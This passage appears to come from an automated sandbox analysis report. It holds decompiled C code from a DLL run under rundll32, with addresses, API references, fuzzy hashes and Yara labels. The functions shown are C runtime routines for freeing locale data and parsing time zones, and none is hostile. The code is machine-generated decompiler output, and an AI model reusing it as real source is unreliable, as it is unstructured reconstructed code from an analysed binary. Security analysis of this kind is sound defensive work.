                          			E6E25BF64(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e2c50b8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E24CBD3(_t46);
							E6E25C7CF( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E24CBD3(_t47);
							E6E25CCC3( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E24CBD3( *((intOrPtr*)(_t74 + 0x7c)));
						E6E24CBD3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E25C0D7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e2c52b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E24CBD3(_t31);
							E6E24CBD3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E24CBD3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E24CBD3(_t74);
			}















                          0x6e25bf6c
                          0x6e25bf70
                          0x6e25bf78
                          0x6e25bf81
                          0x6e25bf86
                          0x6e25bf8d
                          0x6e25bf95
                          0x6e25bf9d
                          0x6e25bfa8
                          0x6e25bfae
                          0x6e25bfaf
                          0x6e25bfb7
                          0x6e25bfbf
                          0x6e25bfca
                          0x6e25bfd0
                          0x6e25bfd4
                          0x6e25bfdf
                          0x6e25bfe5
                          0x6e25bf86
                          0x6e25bfe6
                          0x6e25bfee
                          0x6e25c001
                          0x6e25c014
                          0x6e25c022
                          0x6e25c02d
                          0x6e25c032
                          0x6e25c03b
                          0x6e25c043
                          0x6e25c044
                          0x6e25c044
                          0x6e25c04a
                          0x6e25c04d
                          0x6e25c04d
                          0x6e25c050
                          0x6e25c057
                          0x6e25c059
                          0x6e25c05d
                          0x6e25c065
                          0x6e25c06c
                          0x6e25c072
                          0x6e25c073
                          0x6e25c073
                          0x6e25c07a
                          0x6e25c07c
                          0x6e25c081
                          0x6e25c089
                          0x6e25c08e
                          0x6e25c08f
                          0x6e25c08f
                          0x6e25c092
                          0x6e25c095
                          0x6e25c098
                          0x6e25c09b
                          0x6e25c09b
                          0x6e25c0ad

                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 6E25BFA8
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C7EC
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C7FE
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C810
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C822
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C834
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C846
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C858
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C86A
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C87C
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C88E
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C8A0
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C8B2
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C8C4
                          • _free.LIBCMT ref: 6E25BF9D
                            • Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
                            • Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB
                          • _free.LIBCMT ref: 6E25BFBF
                          • _free.LIBCMT ref: 6E25BFD4
                          • _free.LIBCMT ref: 6E25BFDF
                          • _free.LIBCMT ref: 6E25C001
                          • _free.LIBCMT ref: 6E25C014
                          • _free.LIBCMT ref: 6E25C022
                          • _free.LIBCMT ref: 6E25C02D
                          • _free.LIBCMT ref: 6E25C065
                          • _free.LIBCMT ref: 6E25C06C
                          • _free.LIBCMT ref: 6E25C089
                          • _free.LIBCMT ref: 6E25C0A1
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID:
                          • API String ID: 161543041-0
                          • Opcode ID: 9e2b707382a9bce83ac7c2478675cdbb2857b87fa4640b4bb6638e2bbf7300ad
                          • Instruction ID: 8e10108ec5c9639180e93905bc15030a070d53f974845a8b297362a1babc60cf
                          • Opcode Fuzzy Hash: 9e2b707382a9bce83ac7c2478675cdbb2857b87fa4640b4bb6638e2bbf7300ad
                          • Instruction Fuzzy Hash: 63319E3560430EDFFB648BB8D942B9673FBAF00B15F204829E069CB251EF75A9648B10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25877C, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370timeCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E6E25877C(void* __ebx, void* __edi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				void* _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t171 = __edi;
				_t65 = E6E25822B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6E258289( &_v8) != 0 || E6E258231( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E242188();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6E25822B();
					_t32 =  &_v52; // 0x6e272130
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6E258289(_t32);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6E242188();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x6e2c506c; // 0x5cc08226
						_v100 = _t74 ^ _t192;
						 *0x6e2c5384 =  *0x6e2c5384 | 0xffffffff;
						 *0x6e2c5378 =  *0x6e2c5378 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6e2c7a10 = 0;
						_t78 = E6E251216(0x6e272130, _t167, 0, __eflags,  &_v360,  &_v356, 0x100, 0x6e272130);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6E24F26D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6E251216(0x6e272130, _t167, 0, __eflags,  &_v280, _t184, _v276, 0x6e272130);
									__eflags = _t85;
									if(_t85 == 0) {
										E6E24CBD3(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L73;
									}
								} else {
									_push(0);
									L73:
									E6E24CBD3();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L81:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L81;
							} else {
								_push(_t172);
								E6E25877C(0x6e272130, _t172, __eflags);
							}
						}
						E6E24CBD3(_t183);
						__eflags = _v16 ^ _t192;
						return E6E21F8A5(_v16 ^ _t192, _t167, _t183);
					} else {
						_t89 = E6E258231( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6E25825D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E6E24CBD3( *0x6e2c7a08);
								 *0x6e2c7a08 = 0;
								 *_t194 = 0x6e2c7a18;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6e2c7a18 * 0x3c;
									_t168 =  *0x6e2c7a6c; // 0x0
									_push(_t171);
									 *0x6e2c7a10 = 1;
									_v12 = _t150;
									__eflags =  *0x6e2c7a5e; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t168 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6e2c7ab2; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6e2c7ac0; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t168) * 0x3c;
										}
									}
									_t176 = E6E243CD0(0, _t168);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6e2c7a1c, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6e2c7a70, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6E258225()) = _v12;
								 *((intOrPtr*)(E6E258219())) = _v16;
								_t96 = E6E25821F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t169 =  *0x6e2c7a08; // 0x0
					_t178 = _a4;
					if(_t169 == 0) {
						L12:
						E6E24CBD3(_t169);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6e258b6d
						_t170 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t170 + 1; // 0x6e258b6e
						 *0x6e2c7a08 = E6E24F26D(_t154 - _t170, _t13);
						_t116 = E6E24CBD3(0);
						_t167 =  *0x6e2c7a08; // 0x0
						if(_t167 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6e258b6d
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6e258b6e
							_t119 = E6E24AB60(_t167, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E6E263B33(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6E24BFB3(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6E24BFB3(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6E24BFB3(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6E258225()) = _v8;
										_t128 = E6E258219();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6E263B33(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t169;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L83;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L83:
			}





































































                          0x6e25877c
                          0x6e258786
                          0x6e25878b
                          0x6e25878f
                          0x6e258791
                          0x6e258799
                          0x6e2587a4
                          0x6e258944
                          0x6e258946
                          0x6e258947
                          0x6e258948
                          0x6e258949
                          0x6e25894a
                          0x6e25894b
                          0x6e258950
                          0x6e258954
                          0x6e258956
                          0x6e258959
                          0x6e258960
                          0x6e258964
                          0x6e258967
                          0x6e25896b
                          0x6e25896e
                          0x6e258971
                          0x6e258976
                          0x6e258977
                          0x6e258979
                          0x6e258aa1
                          0x6e258aa1
                          0x6e258aa2
                          0x6e258aa3
                          0x6e258aa4
                          0x6e258aa5
                          0x6e258aa6
                          0x6e258aab
                          0x6e258aae
                          0x6e258aaf
                          0x6e258ab7
                          0x6e258abe
                          0x6e258ac1
                          0x6e258ace
                          0x6e258ad5
                          0x6e258ad6
                          0x6e258ad7
                          0x6e258add
                          0x6e258aec
                          0x6e258af3
                          0x6e258afb
                          0x6e258afd
                          0x6e258b07
                          0x6e258b0a
                          0x6e258b17
                          0x6e258b1a
                          0x6e258b1c
                          0x6e258b35
                          0x6e258b3d
                          0x6e258b3f
                          0x6e258b45
                          0x6e258b4a
                          0x6e258b41
                          0x6e258b41
                          0x00000000
                          0x6e258b41
                          0x6e258b1e
                          0x6e258b1e
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b4c
                          0x6e258aff
                          0x6e258aff
                          0x6e258aff
                          0x6e258b59
                          0x6e258b5b
                          0x6e258b5d
                          0x6e258b5f
                          0x6e258b6f
                          0x6e258b6f
                          0x6e258b61
                          0x6e258b61
                          0x6e258b64
                          0x00000000
                          0x6e258b66
                          0x6e258b66
                          0x6e258b67
                          0x6e258b6c
                          0x6e258b64
                          0x6e258b75
                          0x6e258b80
                          0x6e258b8b
                          0x6e25897f
                          0x6e258983
                          0x6e258988
                          0x6e258989
                          0x6e25898b
                          0x00000000
                          0x6e258991
                          0x6e258995
                          0x6e25899a
                          0x6e25899b
                          0x6e25899d
                          0x00000000
                          0x6e2589a3
                          0x6e2589a9
                          0x6e2589ae
                          0x6e2589b4
                          0x6e2589bb
                          0x6e2589c1
                          0x6e2589c4
                          0x6e2589ca
                          0x6e2589d1
                          0x6e2589d7
                          0x6e2589db
                          0x6e2589e1
                          0x6e2589e4
                          0x6e2589eb
                          0x6e2589f0
                          0x6e2589f0
                          0x6e2589f2
                          0x6e2589f2
                          0x6e2589f5
                          0x6e2589fc
                          0x6e258a14
                          0x6e258a14
                          0x6e258a17
                          0x6e2589fe
                          0x6e2589fe
                          0x6e258a03
                          0x6e258a05
                          0x00000000
                          0x6e258a07
                          0x6e258a09
                          0x6e258a0f
                          0x6e258a0f
                          0x6e258a05
                          0x6e258a1f
                          0x6e258a33
                          0x6e258a39
                          0x6e258a3b
                          0x6e258a49
                          0x6e258a4b
                          0x6e258a3d
                          0x6e258a3d
                          0x6e258a40
                          0x00000000
                          0x6e258a42
                          0x6e258a44
                          0x6e258a44
                          0x6e258a40
                          0x6e258a60
                          0x6e258a67
                          0x6e258a69
                          0x6e258a78
                          0x6e258a7b
                          0x6e258a6b
                          0x6e258a6b
                          0x6e258a6e
                          0x00000000
                          0x6e258a70
                          0x6e258a73
                          0x6e258a73
                          0x6e258a6e
                          0x6e258a69
                          0x6e258a85
                          0x6e258a8f
                          0x6e258a94
                          0x6e258a99
                          0x6e258aa0
                          0x6e258aa0
                          0x6e25899d
                          0x6e25898b
                          0x6e2587bc
                          0x6e2587bc
                          0x6e2587c2
                          0x6e2587c7
                          0x6e2587fd
                          0x6e2587fe
                          0x6e258804
                          0x6e258806
                          0x6e258806
                          0x6e258809
                          0x6e258809
                          0x6e25880b
                          0x6e25880c
                          0x6e258812
                          0x6e25881d
                          0x6e258822
                          0x6e258827
                          0x6e258831
                          0x00000000
                          0x6e258837
                          0x6e258837
                          0x6e258839
                          0x6e25883a
                          0x6e25883a
                          0x6e25883d
                          0x6e25883d
                          0x6e25883f
                          0x6e258840
                          0x6e258847
                          0x6e25884c
                          0x6e258851
                          0x6e258856
                          0x6e25885e
                          0x6e25885f
                          0x6e258865
                          0x6e25886a
                          0x6e25886f
                          0x6e258875
                          0x6e25887a
                          0x6e25887b
                          0x6e25887e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25887e
                          0x6e258883
                          0x6e258884
                          0x6e258889
                          0x6e25888b
                          0x6e25888b
                          0x6e258893
                          0x6e258899
                          0x6e25889c
                          0x6e25889c
                          0x6e2588a0
                          0x00000000
                          0x00000000
                          0x6e2588aa
                          0x6e2588aa
                          0x6e2588ad
                          0x6e2588b0
                          0x6e2588b2
                          0x6e2588c0
                          0x6e2588c2
                          0x6e2588cc
                          0x6e2588cc
                          0x6e2588ce
                          0x6e2588d0
                          0x00000000
                          0x00000000
                          0x6e2588c7
                          0x6e2588c9
                          0x6e2588cb
                          0x6e2588cb
                          0x00000000
                          0x6e2588cb
                          0x00000000
                          0x6e2588c9
                          0x6e2588d2
                          0x6e2588d5
                          0x6e2588d7
                          0x6e2588e2
                          0x6e2588e4
                          0x6e2588ee
                          0x6e2588ee
                          0x6e2588f0
                          0x6e2588f2
                          0x00000000
                          0x00000000
                          0x6e2588e9
                          0x6e2588eb
                          0x6e2588ed
                          0x6e2588ed
                          0x00000000
                          0x6e2588ed
                          0x00000000
                          0x6e2588eb
                          0x6e2588ee
                          0x6e2588d5
                          0x6e2588f4
                          0x6e2588f4
                          0x6e2588f6
                          0x6e2588fa
                          0x6e2588fa
                          0x6e2588ff
                          0x6e258901
                          0x6e258904
                          0x6e258907
                          0x6e258909
                          0x6e25890c
                          0x6e258924
                          0x6e258927
                          0x6e25892a
                          0x6e258932
                          0x6e258937
                          0x6e25893c
                          0x00000000
                          0x6e25893c
                          0x6e25890e
                          0x6e258913
                          0x6e258916
                          0x6e25891b
                          0x6e25891e
                          0x6e258920
                          0x00000000
                          0x00000000
                          0x6e258922
                          0x6e25886f
                          0x00000000
                          0x6e258856
                          0x6e2587c9
                          0x6e2587c9
                          0x6e2587cb
                          0x6e2587cd
                          0x6e2587cd
                          0x6e2587d1
                          0x00000000
                          0x00000000
                          0x6e2587d5
                          0x6e2587e9
                          0x6e2587e9
                          0x6e2587d7
                          0x6e2587d7
                          0x6e2587d7
                          0x6e2587dd
                          0x00000000
                          0x6e2587df
                          0x6e2587df
                          0x6e2587e2
                          0x6e2587e7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e2587e7
                          0x6e2587dd
                          0x6e2587f2
                          0x6e2587f4
                          0x6e258943
                          0x6e258943
                          0x6e2587fa
                          0x6e2587fa
                          0x00000000
                          0x6e2587fa
                          0x00000000
                          0x6e2587f4
                          0x6e2587ed
                          0x6e2587ef
                          0x6e2587ef
                          0x00000000
                          0x6e2587ef
                          0x6e2587c7
                          0x00000000

                          APIs
                          • _free.LIBCMT ref: 6E2587FE
                          • _free.LIBCMT ref: 6E258822
                          • _free.LIBCMT ref: 6E2589A9
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E272130), ref: 6E2589BB
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E258A33
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A70,000000FF,?,0000003F,00000000,?), ref: 6E258A60
                          • _free.LIBCMT ref: 6E258B75
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                          • String ID: 0!'n$0!'n
                          • API String ID: 314583886-1210743812
                          • Opcode ID: 4800e92dfafbe8dee2224090346e3d959ca182952f54ba2d911ceb9486a14eb3
                          • Instruction ID: 8658e827d0e1df55776df3c13426c912fb94c955fdc5083b5a76bfd8b80036cb
                          • Opcode Fuzzy Hash: 4800e92dfafbe8dee2224090346e3d959ca182952f54ba2d911ceb9486a14eb3
                          • Instruction Fuzzy Hash: 87C1357592424EEBDB488FF9CE54AAA7BBBEF42314F1409BAD451D7380E7B08A11C750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24D3EF, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E24D3EF(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6e270c10) {
					E6E24CBD3(_t52);
					_t26 = _a4;
				}
				E6E24CBD3( *((intOrPtr*)(_t26 + 0x3c)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x30)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x34)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x38)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x28)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x2c)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x40)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x44)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6E24D23E(5,  &_v8);
				_v8 =  &_a4;
				return E6E24D28E(4,  &_v8);
			}




                          0x6e24d3f5
                          0x6e24d3f8
                          0x6e24d400
                          0x6e24d403
                          0x6e24d408
                          0x6e24d40b
                          0x6e24d40f
                          0x6e24d41a
                          0x6e24d425
                          0x6e24d430
                          0x6e24d43b
                          0x6e24d446
                          0x6e24d451
                          0x6e24d45c
                          0x6e24d46a
                          0x6e24d472
                          0x6e24d47b
                          0x6e24d483
                          0x6e24d497

                          APIs
                          • _free.LIBCMT ref: 6E24D403
                            • Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
                            • Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB
                          • _free.LIBCMT ref: 6E24D40F
                          • _free.LIBCMT ref: 6E24D41A
                          • _free.LIBCMT ref: 6E24D425
                          • _free.LIBCMT ref: 6E24D430
                          • _free.LIBCMT ref: 6E24D43B
                          • _free.LIBCMT ref: 6E24D446
                          • _free.LIBCMT ref: 6E24D451
                          • _free.LIBCMT ref: 6E24D45C
                          • _free.LIBCMT ref: 6E24D46A
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: b5c57d17f50339d7e7482d3a3b790ac603cd19325689644bcc7dc5f61ea148d3
                          • Instruction ID: 9f7c4102c4263e28cf1bc5931b56c6b5732a8b74c25de712ae395a4058aaa141
                          • Opcode Fuzzy Hash: b5c57d17f50339d7e7482d3a3b790ac603cd19325689644bcc7dc5f61ea148d3
                          • Instruction Fuzzy Hash: E711FB7954420CFFDB05DF98C841DDE3BBAEF04654B2144A0F9098F122DB7ADE549B80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20777F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20777F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
